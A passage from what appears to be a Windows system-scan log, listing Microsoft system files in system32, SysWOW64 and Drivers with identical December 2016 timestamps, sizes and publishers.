2016-12-03 08:34 - 2016-12-03 08:34 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\capisp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAMRNBSink.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Feedback.Analog.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Custom.ps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\regsvr32.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\PaymentMediatorServiceProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mgmtapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\fltLib.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhsvcctl.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024064 _____ (Microsoft Corporation) C:\WINDOWS\system32\adhapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00024006 _____ C:\WINDOWS\system32\gb2312.uce
2016-12-03 08:34 - 2016-12-03 08:34 - 00023824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cmimcext.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.RemoteDesktop.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\WallpaperHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsDeviceAccessRevocation.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbservicetrigger.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\IpNatHlpClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mcd.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00023312 _____ (Microsoft Corporation) C:\WINDOWS\system32\streamci.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshelper.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.SystemManagedAccount.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\uniplat.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ws2ifsl.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\acu.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022984 _____ C:\WINDOWS\system32\bopomofo.uce
2016-12-03 08:34 - 2016-12-03 08:34 - 00022800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tbs.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00022800 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser_broker.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022744 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcwum.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winnsi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\replace.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasctrs.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\PrintDialogHost3D.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\PING.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\nbtstat.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtcVSp1res.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCCSPal.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usb8023.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00022232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022192 _____ (Microsoft Corporation) C:\WINDOWS\system32\msg711.acm
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft) C:\WINDOWS\system32\grb.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\shpafact.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdial.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiltcfg.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\MdmDiagnosticsTool.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\fixmapi.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdPHost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\convert.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\bridgeunattend.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00021776 _____ (Microsoft Corporation) C:\WINDOWS\system32\BOOTVID.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00021656 _____ C:\WINDOWS\system32\NetTrace.PLA.Diagnostics.xml
2016-12-03 08:34 - 2016-12-03 08:34 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Background.ps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoteWipeCSP.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\smclib.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmstplua.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\chkntfs.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\system32\attrib.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00021160 _____ (Microsoft Corporation) C:\WINDOWS\system32\nsi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft) C:\WINDOWS\system32\pegi-pt.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft) C:\WINDOWS\system32\pegi.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\icmui.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshqos.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.StartLayoutPopulationEvents.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\userinitext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntlanui2.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\EsdSip.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\dscproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\NdisVirtualBus.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\defragproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kd_02_1137.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmsgapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\tree.com
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\runas.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\netevent.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\irclass.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\httpprxp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\bnmanager.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHostProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00020208 _____ (Microsoft Corporation) C:\WINDOWS\system32\FsIso.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mscorier.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMmRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winnlsres.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wiatrace.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\umdmxfrm.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\TieringEngineProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Startupscan.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\serialui.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\PATHPING.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\nrpsrv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mscorier.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mpnotify.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\httpprxc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontgroupsoverride.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMmRes.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmdkey.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00019968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidcertstorecheck.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00019632 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksuser.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsock32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshrm.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winshfhc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\syssetup.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\localui.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterpriseetw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\irenum.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\doskey.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00019072 _____ (Microsoft Corporation) C:\WINDOWS\system32\iumbase.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\VmApplicationHealthMonitorProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityRtapiPal.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\netbios.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\mountvol.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\kernelceip.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsunattend.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmpushproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\C_IS2022.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\hh.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\TRACERT.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\stdole2.tlb
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\RmClient.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasautou.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCShellCommonProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrle32.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ktmutil.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\clb.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00018192 _____ (Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00018160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017976 _____ (Microsoft Corporation) C:\WINDOWS\system32\IumSdk.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017935 _____ C:\WINDOWS\system32\EventViewer_EventDetails.xsl
2016-12-03 08:34 - 2016-12-03 08:34 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\wowreg32.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasadhlp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlmsprep.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\find.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CortanaMapiHelper.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017806 ____R C:\WINDOWS\system32\CaptureToast.hcp
2016-12-03 08:34 - 2016-12-03 08:34 - 00017680 _____ (Microsoft Corporation) C:\WINDOWS\system32\WlS0WndH.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017680 _____ (Microsoft Corporation) C:\WINDOWS\system32\kdstub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscproxystub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\whhelper.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsbyuv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\secinit.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityCommonPal.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\print.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRINFO.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\label.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDCHERP.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\fsavailux.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasacd.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsmplpxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\tcmsetup.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\subst.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\regidle.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\pstask.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulation.ProxyStubs.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\MUILanguageCleanup.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\LangCleanupSysprepAction.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hnetmon.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhuxapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\clrhost.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016740 _____ C:\WINDOWS\system32\ShiftJIS.uce
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\snmptrap.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\pstorec.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcwrun.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmcico.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvcProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\finger.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\applockerfltr.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00016144 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wmilib.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00015976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nsi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015976 _____ (Microsoft Corporation) C:\WINDOWS\system32\SlideToShutDown.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft) C:\WINDOWS\system32\djctq.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshirda.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\spwinsat.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnpts.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\msidcrl40.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeedssync.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDJPN.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\ifsutilx.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmiso8601utils.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\c_GSM7.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00015632 _____ (Microsoft Corporation) C:\WINDOWS\system32\backgroundTaskHost.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00015504 _____ (Microsoft Corporation) C:\WINDOWS\system32\psapi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft) C:\WINDOWS\system32\pcbp.rs
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpPortingLibrary.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeSyncTask.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\TapiUnattend.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\sas.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemoveDeviceElevated.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\panmap.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshta.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\KBDKOR.DLL
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Dmpusbstor.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcommandlineutils.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\dhcpcmonitor.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\cfmifsproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\browseui.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\amsiproxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00015120 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntosext.sys
2016-12-03 08:34 - 2016-12-03 08:34 - 00015106 _____ C:\WINDOWS\system32\@WiFiNotificationIcon.png
2016-12-03 08:34 - 2016-12-03 08:34 - 00014952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshhyperv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmcodecdspps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winrssrv.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbperf.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncHostps.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensApi.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\HOSTNAME.EXE
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdBthProxy.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\FamilySafetyExt.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\efsui.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\EasPolicyManagerBrokerPS.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\DockInterface.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\DesktopView.Internal.Broker.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\coreaudiopolicymanagerext.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\chcp.com
2016-12-03 08:34 - 2016-12-03 08:34 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxStreamingDataSourcePS.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014608 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupetw.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSClient.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\verclsid.exe
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\svsvc.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecondaryTileExperienceCallback.ProxyStub.dll
2016-12-03 08:34 - 2016-12-03 08:34 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\recover.exe
